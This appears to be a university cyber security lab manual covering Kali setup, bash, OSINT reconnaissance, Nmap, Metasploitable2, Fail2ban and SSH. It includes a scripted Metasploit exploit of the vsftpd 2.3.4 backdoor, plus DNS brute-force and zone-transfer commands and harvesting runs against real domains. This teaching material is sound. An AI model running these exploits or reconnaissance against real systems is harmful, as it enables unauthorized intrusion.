Cyber Security
AIM:
To learn and experience different ways of installing Kali Linux on VirtualBox.
Kali Linux
Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux
distribution aimed at advanced Penetration Testing and Security Auditing.
VirtualBox
Oracle VM VirtualBox (formerly Sun VirtualBox, Sun xVM VirtualBox and InnoTek VirtualBox) is a type-2 hypervisor for x86 virtualization developed by Oracle. A type-2 hypervisor runs on top of a host operating system, so the Kali guest shares the host's hardware and is separated from it only by the hypervisor.
RESULT:
Thus the procedure for installing Kali Linux on VirtualBox was carried out and tested.
CCS340 - CYBER SECURITY LAB, V Semester AI&DS
Aim
To understand Kali Linux and bash scripting.
Kali Linux is a popular Linux distribution designed for digital forensics, penetration testing,
and network security assessments.
1. Security Auditing:
Kali Linux is specifically built for security auditing and testing purposes. It includes numerous pre-installed tools for vulnerability assessment, penetration testing and digital forensics, and focuses on providing a robust environment for security professionals to assess and strengthen the security of systems and networks.
2. Penetration Testing:
Kali Linux offers a vast array of tools for penetration testing, including network scanning,
vulnerability assessment, wireless attacks, web application testing, and more.
3. Digital Forensics:
Kali Linux provides a rich set of tools and utilities for digital forensics and incident response. Tools like Autopsy, Foremost, The Sleuth Kit and Volatility help in analyzing and recovering data from digital devices, investigating security incidents and conducting forensic examinations.
Kali Linux is built on Debian and uses the APT (Advanced Package Tool) package manager,
making it easy to install and manage additional software packages.
Kali Linux has extensive documentation available on their official website, including
tutorials, guides, and a user forum.
The Kali Linux community is active and supportive, providing assistance and sharing
knowledge through forums, blogs, and social media channels.
Bash scripting
A bash script is a series of commands written in a file. They are read and executed by the bash program, one line at a time. By naming convention, bash scripts end with .sh.
Scripts start with a shebang: the characters #! followed by the absolute path of the bash interpreter, on the first line of the file. When the file is executed directly, the kernel reads the shebang and runs the script with that interpreter.
#! /bin/bash
The path of the bash program can vary between systems. We will see later how to identify it.
Execution rights
A script must carry the execute right for the user running it. In ls -l output the execute right is shown as x. In the example, the user has rwx (read, write, execute) rights on the file test_script.sh.
File colour
In a colour-enabled ls listing, executable scripts appear in a different colour from the rest of the files and folders; with the default colour scheme, files with execute rights appear green.
touch hello_world.sh
which bash
In my case, the path is /usr/bin/bash and I will include this in the shebang.
chmod modifies the existing rights of a file for a particular user class. Here we are adding the execute right (x) for the user who owns the file.
Run the script.
You can run the script in the following ways:
./hello_world.sh
bash hello_world.sh
Fractions are not calculated correctly with bash's built-in integer arithmetic: the fractional part is truncated.
For decimal calculations we can use the bc command to get the output to a particular number of decimal places. bc (basic calculator) is a separate command-line calculator with arbitrary precision, not part of bash itself.
echo "scale=2;22/7" | bc
Here scale defines the number of decimal places kept in the output; bc truncates rather than rounds at that position.
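Putting the pieces above together, here is an added example script (not part of the lab manual) that contrasts bash integer arithmetic with decimal output through bc, falling back to awk when bc is not installed; it also shows the execute-bit check and both ways of running a script. The file name and the numbers are made up for the demonstration.

```bash
#!/bin/bash
# Added example: integer vs. decimal arithmetic in bash, plus the execute-bit check.
# Assumptions: POSIX awk is available; bc is optional (used only when installed).

# Integer division with $(( )): the fractional part is truncated, never rounded.
int_div() {
    echo $(( $1 / $2 ))
}

# Decimal division to N places (default 2).  bc truncates at 'scale' digits
# (22/7 -> 3.14); the awk fallback rounds with printf, which agrees here but can
# differ from bc when the first dropped digit is 5 or more, and prints a leading
# 0 where bc prints ".25".
dec_div() {
    local a=$1 b=$2 scale=${3:-2}
    if command -v bc >/dev/null 2>&1; then
        echo "scale=${scale}; ${a}/${b}" | bc
    else
        awk -v a="$a" -v b="$b" -v fmt="%.${scale}f\n" 'BEGIN { printf fmt, a/b }'
    fi
}

# True when the file carries the execute bit for the current user (the x in rwx).
is_executable() {
    [ -x "$1" ]
}

# Create hello_world.sh, add the execute bit with chmod, and run it both ways.
hello_demo() {
    local dir script
    dir=$(mktemp -d)
    script="$dir/hello_world.sh"
    printf '#!/bin/bash\necho "Hello, world"\n' > "$script"
    if is_executable "$script"; then echo "unexpected: executable before chmod"; fi
    chmod u+x "$script"                   # add the execute right for the owner
    "$script"                             # direct execution needs the x bit
    bash "$script"                        # bash <file> works even without it
    rm -rf "$dir"
}
```

Run `hello_demo` to see the chmod step in action; `dec_div 22 7 4` shows why the page's scale parameter matters.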
RESULT:
Thus the procedure for exploring Kali Linux and bash scripting was carried out and tested.
Aim:
To perform open source intelligence gathering using Netcraft, Whois lookups, DNS reconnaissance, theHarvester and Maltego.
On the site report page, scroll down to the "Hosting History" section. This section shows the hosting provider and IP address of the website.
You can reach the same report directly with a single query URL in your browser:
https://sitereport.netcraft.com/?url=[WEBSITE_URL]
The report also lists the subdomains associated with the website, along with their IP addresses and web server technologies.
https://sitereport.netcraft.com/?url=[WEBSITE_URL]&tbl=server
For example, to search for the web server technology used by Tesla, the query string would be:
https://sitereport.netcraft.com/?url=tesla.com&tbl=server
To check for phishing sites, bug hunters can use the following query string:
https://sitereport.netcraft.com/?url=[WEBSITE_URL]&tab=phishing
For example, to search for phishing sites associated with Tesla, the query string would be:
https://sitereport.netcraft.com/?url=tesla.com&tab=phishing
Whois Lookup
Whois is a query and response protocol used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system number.
About Whois
Whois is an Internet service and protocol that searches and displays information about a
domain name from repositories of domain name registrars worldwide.
Features:
Provides administrative information such as the registrar and contact information for the individual or organization that controls the domain.
An essential resource for maintaining the integrity of the domain name registration and website ownership process.
WHOIS Lookups
https://whois.domaintools.com/
https://www.name.com/whois-lookup
Some insights:
Whois Record
It is a record that contains the basic information associated with the person, group or company that registered a particular domain name: name(s), phone number(s), physical address, registrar, registration and expiry dates, and the DNS servers, which can then be interrogated. Note that many registrars now redact the registrant's contact details for privacy, so often only the registrar, the dates and the name servers remain visible.
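As an added example (not from the lab manual), the shell functions below pull the fields a pentester usually records out of a WHOIS reply: registrar, creation and expiry dates, registrant and the name servers. The record is a constructed sample shaped like a registrar's response; lookup_and_summarize runs the real whois client when it is installed.

```bash
#!/bin/bash
# Added example: extract key fields from a WHOIS record.
# SAMPLE_WHOIS is a constructed record in the usual "Field: value" layout.
SAMPLE_WHOIS='Domain Name: EXAMPLE.COM
Registrar: Example Registrar, Inc.
Creation Date: 1995-08-14T04:00:00Z
Registry Expiry Date: 2025-08-13T04:00:00Z
Registrant Organization: REDACTED FOR PRIVACY
Name Server: A.IANA-SERVERS.NET
Name Server: B.IANA-SERVERS.NET
DNSSEC: signedDelegation'

# whois_field <field-name> <record>: print every value of that field, one per line.
# The separator is ": " (colon + space) so ISO timestamps are not split on ':'.
whois_field() {
    printf '%s\n' "$2" | awk -F': ' -v key="$1" 'tolower($1) == tolower(key) { print $2 }'
}

# whois_summary <record>: the fields worth keeping during OSINT.
whois_summary() {
    echo "registrar:   $(whois_field 'Registrar' "$1")"
    echo "created:     $(whois_field 'Creation Date' "$1")"
    echo "expires:     $(whois_field 'Registry Expiry Date' "$1")"
    echo "registrant:  $(whois_field 'Registrant Organization' "$1")"
    echo "nameservers: $(whois_field 'Name Server' "$1" | tr '\n' ' ')"
}

# nameserver_count <record>: how many NS entries the registrar lists.
nameserver_count() {
    whois_field 'Name Server' "$1" | grep -c .
}

# lookup_and_summarize <domain>: live query through the whois client, if present.
lookup_and_summarize() {
    if command -v whois >/dev/null 2>&1; then
        whois_summary "$(whois "$1")"
    else
        echo "whois client not installed" >&2
        return 1
    fi
}
```

The name servers are the hand-off point to the DNS reconnaissance below: each one is a candidate for the zone transfer check.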
DNS reconnaissance
Zone Transfer
The security problem with DNS zone transfer (AXFR) is that it can be used to map the topology of a company's network. When a client requests a zone transfer it asks the name server for the entire zone: name servers, host names, MX and CNAME records, the zone serial number, TTL values and so on. A properly configured server only answers zone transfer requests from its own secondary name servers.
Reverse Lookup
According to Wikipedia, a reverse DNS lookup is the determination of the domain name associated with an IP address. DNSRecon can perform a reverse lookup for PTR (pointer) records against IPv4 and IPv6 address ranges. To run reverse lookup enumeration, use the command
./dnsrecon.py -r <startIP-endIP>
A reverse lookup can also be performed against all the ranges listed in the domain's SPF record with the command ./dnsrecon.py -d <domain> -s. The next image shows the output of a reverse lookup over a range of IP addresses.
Reverse Lookup
Domain Brute-Force
For this technique all we have to do is supply a name list; DNSRecon then tries to resolve the A, AAAA and CNAME records for each entry against the domain, one by one. To run the domain name brute-force, type:
./dnsrecon.py -d <domain> -D <namelist> -t brt
Domain Brute-Force
As we can see we obtained A and CNAME records of the domain cnn.com and their IP
addresses.
Cache Snooping
DNS cache snooping checks whether a DNS server has a specific record cached (typically by sending non-recursive queries), which reveals which names the server's clients have recently resolved.
./dnsrecon.py -t snoop -n <server> -D <dict>
Zone Walking
This technique may unveil internal records if a DNSSEC-signed zone uses NSEC records (rather than NSEC3) and so exposes the chain of names in the zone. The information obtained helps map network hosts by enumerating the contents of the zone. To perform zone walking, type the command:
./dnsrecon.py -d <host> -t zonewalk
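The zone transfer check is the one most worth automating, so here is an added example (not from the lab manual or DNSRecon) that tries an AXFR against each name server of a domain with dig and, when a server answers, lists the A records and flags those pointing at private (RFC 1918) addresses, which is exactly the internal-topology leak described above. DNSRecon does the same with ./dnsrecon.py -d <domain> -t axfr. The AXFR output below is a constructed sample in dig's format; the domain, server and addresses are placeholders.

```bash
#!/bin/bash
# Added example: detect a permitted zone transfer and pull hosts out of it.
# SAMPLE_AXFR is constructed in `dig AXFR` output format (placeholder names/IPs).
SAMPLE_AXFR='; <<>> DiG 9.18.1 <<>> AXFR example.test @ns1.example.test
;; global options: +cmd
example.test.           3600 IN SOA   ns1.example.test. hostmaster.example.test. 2024010101 7200 3600 1209600 3600
example.test.           3600 IN NS    ns1.example.test.
example.test.           3600 IN MX    10 mail.example.test.
mail.example.test.      3600 IN A     192.0.2.25
vpn.example.test.       3600 IN A     192.0.2.30
intranet.example.test.  3600 IN A     10.0.0.5
backup.example.test.    3600 IN A     172.16.4.9
www.example.test.       3600 IN CNAME mail.example.test.
example.test.           3600 IN SOA   ns1.example.test. hostmaster.example.test. 2024010101 7200 3600 1209600 3600
;; Query time: 3 msec'

# axfr_allowed < dig-output : true if the server handed over the zone
# (a refused transfer prints "; Transfer failed." and no SOA record).
axfr_allowed() {
    awk '/Transfer failed/ { fail = 1 }
         /^;/ { next }
         $4 == "SOA" { soa = 1 }
         END { exit !(soa && !fail) }'
}

# axfr_a_records < dig-output : "name ip" for every A record in the transfer.
axfr_a_records() {
    awk '!/^;/ && $4 == "A" { print $1, $5 }'
}

# private_hosts < "name ip" lines : only hosts on RFC 1918 ranges, i.e. the
# internal records that should never have been visible from the Internet.
private_hosts() {
    awk '$2 ~ /^10\./ || $2 ~ /^192\.168\./ || $2 ~ /^172\.(1[6-9]|2[0-9]|3[01])\./'
}

# check_zone_transfer <domain> : live check against each NS (needs dig + network).
check_zone_transfer() {
    for ns in $(dig +short NS "$1"); do
        out=$(dig +nocmd AXFR "$1" "@$ns" 2>&1)
        if printf '%s\n' "$out" | axfr_allowed; then
            echo "[!] $ns allows AXFR for $1"
            printf '%s\n' "$out" | axfr_a_records | private_hosts | sed 's/^/    internal: /'
        else
            echo "[ok] $ns refuses AXFR for $1"
        fi
    done
}
```

The fix on the server side is an allow-transfer (BIND) or equivalent ACL restricted to the secondaries; re-run check_zone_transfer afterwards to confirm every NS now refuses.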
theHarvester
What is theHarvester?
theHarvester is a command-line tool made by the team at Edge-Security for gathering emails, subdomains, hosts and IP addresses. Its passive data sources include services such as dnsdumpster and DuckDuckGo; it also has active modules (DNS brute force and similar checks) that contact the target directly.
Installing
There are 4 different installation methods for theHarvester.
We now proceed with installing the software by the third option, cloning the repository. As always, it is important to use some type of sandboxed environment when installing new software.
First, we should update our sandbox and install the software we will need.
Now we can make a Python virtual environment to install the necessary Python packages:
python3 -m venv harvest
cd harvest/
source bin/activate
git clone https://github.com/laramies/theHarvester
cd theHarvester/
pip install wheel
pip install -r requirements/base.txt
We found a minor bug during the installation and had to install the pip package 'wheel' before installing the other packages from 'base.txt'.
1. Securitycode
Run the following:
python theHarvester.py -d rpfront.com -l 50 -b Securitycode
There is a lot more data here. We found 3 related IPs and 2 hosts.
2. ThreatCrowd
We found no results when using ThreatCrowd as the source.
3. UrlScan
Running:
python theHarvester.py -d rpfront.com -l 50 -b urlscan
Primary OSINT data sources are great for finding IPs and hosts. The good thing is that this
tool offers a big set of sources to choose from, we will now attempt to run more tests using
other third party services.
With the lack of results, it was a bit concerning that we might be doing something wrong. So we decided to test out the Hunter API to see if we found any data regarding 'moslempress' there. Unfortunately, we found nothing there either:
python theHarvester.py -d moslempress.com -l 10 -b hunter
Running against all sources at once and writing an HTML report:
python theHarvester.py -d moslempress.com -l 50 -b all -f moslempress.html
The 2 data sources corroborate what the current IP address for www[.]moslempress[.]com is. The number of data points here showcases the value of theHarvester.
Maltego
Maltego is software used for open-source intelligence and forensics, developed by Paterva from Pretoria, South Africa. Maltego focuses on providing a library of transforms for the discovery of data from open sources, and on visualizing that information in a graph format.
You can download Maltego for Windows, Linux or Mac from the official site.
Maltego is offered in three editions:
1. Community
2. Professionals
3. Enterprises
The community version is free to use; the others are paid and offer more features.
Maltego uses graphs to show the data and information it collects. Now let's see how to create a new graph.
Graphs in Maltego
To create a new graph, go to the application tab and click New Graph, or select the New Graph option from the top-left corner.
This is how a graph in Maltego looks. Once you have created a new graph you get a fresh page in a new tab, surrounded by a range of control windows.
Now select the entity you want to perform OSINT on, such as a domain name, a DNS name or a person. Basically, you can gather information about any of these entity types; just select an entity.
Here we have selected a domain name. Now enter any domain you want and click on the entity.
This expands all the available information on the domain and shows it as a tree, as in the screenshot below. Here you can see all the DNS records found for the domain.
Transform Hub
If you right-click on a selected entity, a context menu opens listing the available transforms (provided through the Transform Hub), from which you can search for all sorts of information about the domain and fetch what is available.
(source: maltego.com)
This is how the transform menu looks, and this is just a short part of it; it has many more options.
This is what you can find from just a domain with this tool.
Result:
Thus open source intelligence gathering using Netcraft, Whois lookups, DNS reconnaissance, theHarvester and Maltego was tested and learned.
Ex.No: 4 Understand the nmap command and scan a target using nmap
Date :
Aim
To read, understand and practise the nmap command and scan a target using nmap.
About Nmap
Nmap is a free and open source network exploration and security auditing tool that is widely
used for discovering hosts and services on a computer network.
The command nmap -h displays the help menu for Nmap. It provides a list of the available options that can be used with the nmap command.
The nmap -d option enables debug mode, which makes Nmap print detailed debugging output about what it is doing; it is meant for troubleshooting a scan rather than for everyday use.
Nmap offers various scan types; one of the most basic and commonly used is the version detection scan (-sV), which probes open ports to identify the service and version running on them.
When you use the -sC option, Nmap runs its default set of NSE scripts, which are deemed safe and non-intrusive.
A UDP scan (-sU) of the target host at IP address 192.168.0.1 sends UDP packets to each port on the target and analyzes the responses to determine which ports are open, closed or open|filtered; because an open UDP port usually sends no reply, this scan is far slower than a TCP scan.
Aggressive scan
The -A option in Nmap enables aggressive scanning, which can provide more
information about the target host or network than a regular scan.
nmap -A scanme.nmap.org
Nmap can also scan more than one host or IP address in a single run.
Parallelism:
Host Group:
If you want to scan multiple hosts at the same time, the --min-hostgroup and --max-hostgroup options set how many hosts Nmap scans in parallel, to make the scan time-efficient.
Host Timeout:
--host-timeout makes Nmap give up on a host after the given duration, so a single slow host or port does not hold up the whole scan.
Scan Delay:
Scan delay pauses Nmap for the given time between each probe or request it sends. This is useful when dealing with a time-based firewall, rate limiting or an IDS. The options are --scan-delay and --max-scan-delay.
In the image below you can see that the first SYN packet arrived at 01:54:53 and the second at 01:55:05, confirming a 12-second delay between packets.
Packet Rate:
With the packet rate options we specify how many packets Nmap should send per second.
Minimum Rate:
With --min-rate 3, Nmap sends at least three packets per second (it may send faster, never slower).
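To make the scan output usable downstream (for instance to feed the service list into the Metasploitable exercises that follow), here is an added example (not from the lab manual or the Nmap project) that runs a version scan in greppable format with the timing options described above and parses the result into one line per open port. The scan line is a constructed sample in Nmap's -oG format, with services modelled on Metasploitable 2; the target address is a placeholder.

```bash
#!/bin/bash
# Added example: parse Nmap greppable (-oG) output into "port proto service version".
# SAMPLE_OG is a constructed line in -oG format (services modelled on Metasploitable 2).
SAMPLE_OG='Host: 192.168.0.1 ()    Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1/, 23/open/tcp//telnet//Linux telnetd/, 80/open/tcp//http//Apache httpd 2.2.8/, 139/filtered/tcp//netbios-ssn///, 1524/open/tcp//bindshell//Metasploitable root shell/    Ignored State: closed (994)'

# open_ports < og-output : one "port proto service version" line per open port.
# Each entry is port/state/proto/owner/service/rpc/version; only state==open is kept.
open_ports() {
    grep '^Host: ' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | sed 's/^ *//' \
    | awk -F/ '$2 == "open" { print $1, $3, $5, $7 }'
}

# open_port_count < og-output : number of open ports found.
open_port_count() {
    open_ports | grep -c .
}

# version_of <port> < og-output : the detected version string for one port.
version_of() {
    open_ports | awk -v p="$1" '$1 == p { $1 = $2 = $3 = ""; sub(/^ +/, ""); print }'
}

# scan_services <target> : live version scan, slowed down to stay under rate limits
# (--scan-delay / --max-rate) but never stalling on a dead host (--host-timeout).
scan_services() {
    nmap -sV -oG - --scan-delay 200ms --max-rate 50 --host-timeout 10m "$1" | open_ports
}
```

Pipe `scan_services 192.168.0.1` into `version_of 21` to get just the FTP banner; a version string containing a comma would be split by tr, so check the raw -oG line if a field looks truncated.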
Result :
Thus the nmap command was understood and a target was scanned using nmap.
Ex.No: 5 Install Metasploitable2 on VirtualBox and search for unpatched vulnerabilities
Date :
Aim:
To learn and experience installing Metasploitable2 on VirtualBox and searching for unpatched vulnerabilities.
Metasploitable 2
A test environment provides a secure place to perform penetration testing and security
research.
Downloading and Setting Up Metasploitable 2
The easiest way to get a target machine is to use Metasploitable 2, which is an
intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common
vulnerabilities.
Install Metasploitable2 on VirtualBox
Download the Metasploitable 2 archive and extract the zip file; you will get the virtual disk image (VMDK) file.
In VirtualBox, click New to create the virtual machine and operating system.
Name the machine metasploitable2 and change the type to Linux (Debian 64-bit).
In the hardware section, set the base memory to 512 MB and the processors to 1.
In the virtual hard disk section, click "Use an existing virtual hard disk file".
Click Add and select the Metasploitable VMDK virtual disk image file, then finish creating the VM and start it.
Log in to Metasploitable2 with the default username msfadmin and password msfadmin.
Metasploitable2 is now installed. Keep it on a host-only or internal network: it is deliberately full of remotely exploitable services and must never be reachable from the Internet.
Scanning it with Nmap's version detection (-sV) lists the version and service details; among them the FTP service (vsftpd) is vulnerable to a backdoor.
So finally we have installed Metasploitable2 and found an unpatched vulnerability.
RESULT:
Thus the procedure for installing Metasploitable2 on VirtualBox and searching for unpatched vulnerabilities was carried out and tested.
Aim:
To use Metasploit to exploit an unpatched vulnerability inside the system.
Procedure
Metasploit is a popular penetration testing tool that can be used to identify and exploit
vulnerabilities in computer systems and networks.
Start the Metasploitable2 machine, because that is the target we are going to exploit.
From the version and service details (the Nmap -sV scan) we found the FTP service vulnerable to a backdoor. In msfconsole, search for a matching module:
search vsftpd
Now you will get the exploit module; select it with use.
Set RHOSTS (the remote host address of the Metasploitable2 VM) and, if needed, RPORT (the remote port, 21 by default); this module has no payload to choose because the backdoor itself provides the shell.
exploit
Now the machine is exploited and you get a command shell session on the target (this module yields a plain Unix shell, not a Meterpreter session).
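The msfconsole steps above can be scripted so the exploit is repeatable. The shell functions below are an added example (not from the lab manual or the Metasploit project): they write a resource script for exploit/unix/ftp/vsftpd_234_backdoor (the module that search vsftpd turns up) and run it with msfconsole -r. The target address is an assumed placeholder for your own lab VM.

```bash
#!/bin/bash
# Added example: drive the vsftpd 2.3.4 backdoor module from a resource script.
# Assumes Metasploitable 2 is reachable at the address passed in (placeholder below).

# write_vsftpd_rc <target-ip> <outfile> : write the msfconsole commands to run.
write_vsftpd_rc() {
    cat > "$2" <<EOF
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS $1
set RPORT 21
run
sessions -l
EOF
    printf '%s\n' "$2"
}

# rc_target <rcfile> : read back which host the script targets (sanity check
# before running anything, so the exploit never goes at the wrong box).
rc_target() {
    awk '$1 == "set" && $2 == "RHOSTS" { print $3 }' "$1"
}

# run_rc <rcfile> : execute it quietly; msfconsole must be installed.
run_rc() {
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$1"
    else
        echo "msfconsole not found; resource script left at $1" >&2
        return 1
    fi
}

# Typical use against your own lab VM (placeholder address):
# rc=$(write_vsftpd_rc 192.168.56.101 /tmp/vsftpd.rc) && run_rc "$rc"
```

After `run`, `sessions -l` confirms the session type; interact with it using `sessions -i <id>` and you get the plain shell described above.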
Result:
Thus the use of Metasploit to exploit an unpatched vulnerability was understood and practised.
Ex.No: 7 Install Linux server on VirtualBox and install SSH
Date :
Aim :
To learn and experience installing a Linux server on VirtualBox and installing SSH.
Procedure
Create New VM
Click on the "New" button to create a fresh virtual machine.
If you plan to use the virtual hard disk later in VMware, choose VMDK; otherwise leave the default VDI option selected.
Also leave the default "Dynamically allocated" option selected and allocate around 30 GB of virtual disk space.
Now we need to select the downloaded Ubuntu 22.04 ISO file as the start-up disk to boot the virtual machine. Once added, the ISO image shows in the "ISO Image selection" area; scroll to the Ubuntu 22.04 LTS image and hit Choose. Finally, click the Start button.
After that, press Enter again to let the installer select the default Ubuntu mirror to fetch packages from.
Then, if you want to access the server remotely using SSH, select "Install OpenSSH Server" with the arrow keys and the spacebar; otherwise simply select "Done" and move forward, because it can be installed later.
sudo -i
passwd
If you do not find the port 22 among open ports, open it in your firewall:
sudo ufw allow ssh
sudo ufw status verbose
You can also do it using the graphical interface of the UFW firewall.
Then, in the VM's network settings, go to Advanced -> Port Forwarding and add a rule with these settings:
Name: ssh (or whatever you like)
Protocol: TCP
Host Port: 2222 (or any other port you like)
Guest Port: 22
Similarly, you can set port forwarding for other services.
Now connect to the VirtualBox guest using the port 2222 we set earlier and the username of your guest OS.
You can find the guest's IP address by running this command inside it:
ip a
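To verify the SSH setup without guessing, here is an added example (not from the lab manual) that checks whether sshd is actually listening on port 22 from ss -tln output, opens the firewall only if needed, and adds the VirtualBox NAT port-forwarding rule from the command line instead of the GUI. The ss output is a constructed sample; the VM name is an assumed placeholder.

```bash
#!/bin/bash
# Added example: confirm sshd is listening, then expose it through VirtualBox NAT.
# SAMPLE_SS is constructed `ss -tln` output; "ubuntu-server" below is a placeholder VM name.
SAMPLE_SS='State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port
LISTEN  0       128            0.0.0.0:22           0.0.0.0:*
LISTEN  0       128               [::]:22              [::]:*
LISTEN  0       4096     127.0.0.53%lo:53           0.0.0.0:*'

# listening_on <port> < ss-output : true if any LISTEN socket is bound to that port.
listening_on() {
    awk -v p="$1" '$1 == "LISTEN" && $4 ~ (":" p "$") { found = 1 } END { exit !found }'
}

# ensure_ssh_open : open the firewall for SSH only when 22 is not already reachable.
# If sshd is not running at all, `ufw allow` alone will not help, hence the status check.
ensure_ssh_open() {
    if ss -tln | listening_on 22; then
        echo "sshd is listening on port 22"
    else
        echo "port 22 not listening; opening the firewall and checking the service"
        sudo ufw allow ssh
        sudo ufw status verbose
        systemctl status ssh --no-pager
    fi
}

# vbox_forward_ssh <vm-name> [host-port] : same rule as Advanced -> Port Forwarding
# (Name ssh, TCP, host 2222 -> guest 22). Run on the host while the VM is powered off.
vbox_forward_ssh() {
    VBoxManage modifyvm "$1" --natpf1 "ssh,tcp,,${2:-2222},,22"
}

# ssh_via_forward <user> [host-port] : connect from the host through the forwarded port.
ssh_via_forward() {
    ssh -p "${2:-2222}" "$1@127.0.0.1"
}

# Typical sequence on the host:  vbox_forward_ssh ubuntu-server && ssh_via_forward alice
```

Forwarding 2222 only on the host loopback is fine for a lab; if you later bind the forward to a LAN-facing host address, treat the guest's sshd as Internet-exposed and move to key-based authentication.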
Result:
Thus the procedure for installing a Linux server on VirtualBox and installing SSH was carried out and tested.
Ex.No: 8 Use Fail2ban to scan log files and ban IPs that show malicious signs
Date :
Aim
To understand how to use Fail2ban to scan log files and ban IPs that show malicious signs.
Procedure
Format of the Logfile
At the simplest logging level, entries will appear in /var/log/fail2ban.log as follows (fail2ban
version 1.0.2):
...
2023-02-17 23:44:17,037 fail2ban.actions [992]: NOTICE [apache-auth] Ban XXX.91.244.228
2023-02-17 23:44:26,259 fail2ban.actions [992]: NOTICE [apache-auth] Unban XXX.122.233.27
2023-02-17 23:54:15,034 fail2ban.actions [992]: NOTICE [apache-auth] Unban XXX.91.244.228
2023-02-18 00:58:41,938 fail2ban.actions [992]: NOTICE [apache-noscript] Ban XXX.239.163.126
This is all very interesting, but what if you want to see a summary report so that you can try
to identify IP addresses that regularly trigger Fail2Ban - so that you can send a report to their
ISP or block them using a firewall script for example?
Grouping by IP address:
Note: the awk variable NF equals the number of fields in each row of the logfile, so $NF is the value of the last field (the IP address) and $(NF-1) the action (Ban or Unban).
Sample output:
...
4 XXX.124.81.130
5 XXX.248.175.246
8 XXX.29.45.142
Remember that each time an IP address gets banned it is because it has been caught at least maxretry times, so a total of 8 bans represents maybe 30 matches in the relevant logfile.
This is the best report for identifying problem subnets. The output is the first two octets of the most 'caught' subnets:
...
75 83.110.
90 219.95.
154 210.213.
Let's take the last one on the list (210.213.) and see what it has been up to.
The output shows how many times that prefix appears in each logfile:
fail2ban.log:39
fail2ban.log.1.gz:129
fail2ban.log.2.gz:55
fail2ban.log.3.gz:78
fail2ban.log.4.gz:22
zcat -f /var/log/fail2ban.log* \
| awk '($(NF-1) == "Ban" && $NF ~ /^210\.213\./){print $NF}' \
| sort | uniq -c
The output of this will be a list of the IP addresses starting with 210.213.
Grouping by IP address and Hostname:
The command for including hostnames in the list is a bit more complicated.
Note that the logresolve step can take some time to execute, especially if there are a lot of IP addresses to be processed, since each one needs a reverse DNS lookup.
...
4 XXX.net.pk (XXX.83.169.221)
5 XXX.248.175.246 (XXX.248.175.246)
8 XXX.example.com.au (XXX.29.45.142)
You can of course just run host, dig, nslookup or logresolve manually on the addresses that
you want to identify.
This shows us which services each IP address has been trying to access/exploit:
...
4 XXX.124.81.130 [sendmail]
5 XXX.248.175.246 [sendmail]
8 XXX.29.45.142 [sendmail]
Now you know which logfiles to look in to see what they were doing to get banned.
The output will be the same as the second report above, but limited to just today's activity
rather than the whole logfile.
This can give you an idea of longer-term trends and the effectiveness of your firewall rules.
This method of examining all logfiles rather than just the current one can also be applied to
most of the reports above.
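The reports above are awk pipelines over fail2ban's own log; here they are collected into one added example (not from the lab manual) that you can run against /var/log/fail2ban.log and the rotated .gz copies. The log lines are a constructed sample in the 1.x layout shown earlier, with documentation-range addresses in place of real ones.

```bash
#!/bin/bash
# Added example: summary reports over fail2ban's own log.
# SAMPLE_LOG is constructed in the fail2ban 1.x layout (RFC 5737 test addresses).
SAMPLE_LOG='2023-02-17 23:44:17,037 fail2ban.actions [992]: NOTICE [apache-auth] Ban 203.0.113.9
2023-02-17 23:50:02,101 fail2ban.actions [992]: NOTICE [sshd] Ban 198.51.100.7
2023-02-17 23:54:15,034 fail2ban.actions [992]: NOTICE [apache-auth] Unban 203.0.113.9
2023-02-18 00:58:41,938 fail2ban.actions [992]: NOTICE [apache-noscript] Ban 203.0.113.9
2023-02-18 01:10:00,500 fail2ban.actions [992]: NOTICE [sshd] Ban 203.0.113.44
2023-02-18 02:00:00,000 fail2ban.actions [992]: NOTICE [sshd] Ban 198.51.100.7'

# Every report reads log text on stdin. $NF is the IP, $(NF-1) the action
# (Ban/Unban), $(NF-2) the jail in square brackets. Unban lines are skipped.

# bans_by_ip : "<count> <ip>", least banned first
bans_by_ip() {
    awk '$(NF-1) == "Ban" { print $NF }' | sort | uniq -c | sort -n
}

# bans_by_subnet : "<count> <a.b.>" grouped on the first two octets
bans_by_subnet() {
    awk '$(NF-1) == "Ban" { split($NF, o, "."); print o[1] "." o[2] "." }' | sort | uniq -c | sort -n
}

# bans_by_ip_and_jail : "<count> <ip> [jail]" shows which service each IP hammered
bans_by_ip_and_jail() {
    awk '$(NF-1) == "Ban" { print $NF, $(NF-2) }' | sort | uniq -c | sort -n
}

# ban_count <ip> : number of bans for one address
ban_count() {
    awk -v ip="$1" '$(NF-1) == "Ban" && $NF == ip { n++ } END { print n + 0 }'
}

# top_subnet : the most banned prefix, as "<count> <a.b.>"
top_subnet() {
    bans_by_subnet | tail -1 | awk '{ print $1, $2 }'
}

# bans_today : restrict any report to the current day, e.g.  all_logs | bans_today | bans_by_ip
bans_today() {
    grep "^$(date +%F) "
}

# all_logs : current log plus rotated copies (zcat -f passes plain files through)
all_logs() {
    zcat -f /var/log/fail2ban.log*
}
```

A prefix that tops `all_logs | bans_by_subnet` week after week is a candidate for a permanent firewall rule, which is the decision the reports above are meant to support.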
In the FTP example we have used the DROP policy instead of REJECT, as that causes the connection to hang for a longer time rather than giving an instant notification that it has been rejected.
At some point (hopefully) the source computer will be 'fixed' or in any case stop abusing
your server. You should then remove the firewall rules.
[fail2ban-smtp]
enabled  = true
port     = smtp
logpath  = /var/log/fail2ban.log
maxretry = 3
findtime = 6h
bantime  = 1d
The matching filter, /etc/fail2ban/filter.d/fail2ban-smtp.conf, holds the failregex in its [Definition] section.
With these settings, fail2ban will monitor its own logfile and, if a HOST is banned three times (maxretry) in six hours (findtime), it will incur a new ban lasting a full 24 hours (bantime).
fail2ban-regex --print-all-matched /var/log/fail2ban.log /etc/fail2ban/filter.d/fail2ban-smtp.conf
The first argument is the logfile to be scanned and the second the filter configuration file containing the failregex.
If nothing is being matched, or everything is being matched, that may suggest a problem with the regexp. Otherwise, if everything looks ok, you can start the new jail as described above.
Result:
Thus the use of Fail2ban to scan log files and ban IPs that show malicious signs was developed and learned.
Aim
To learn how to Launch brute-force attacks on the Linux server using Hydra.
Procedure
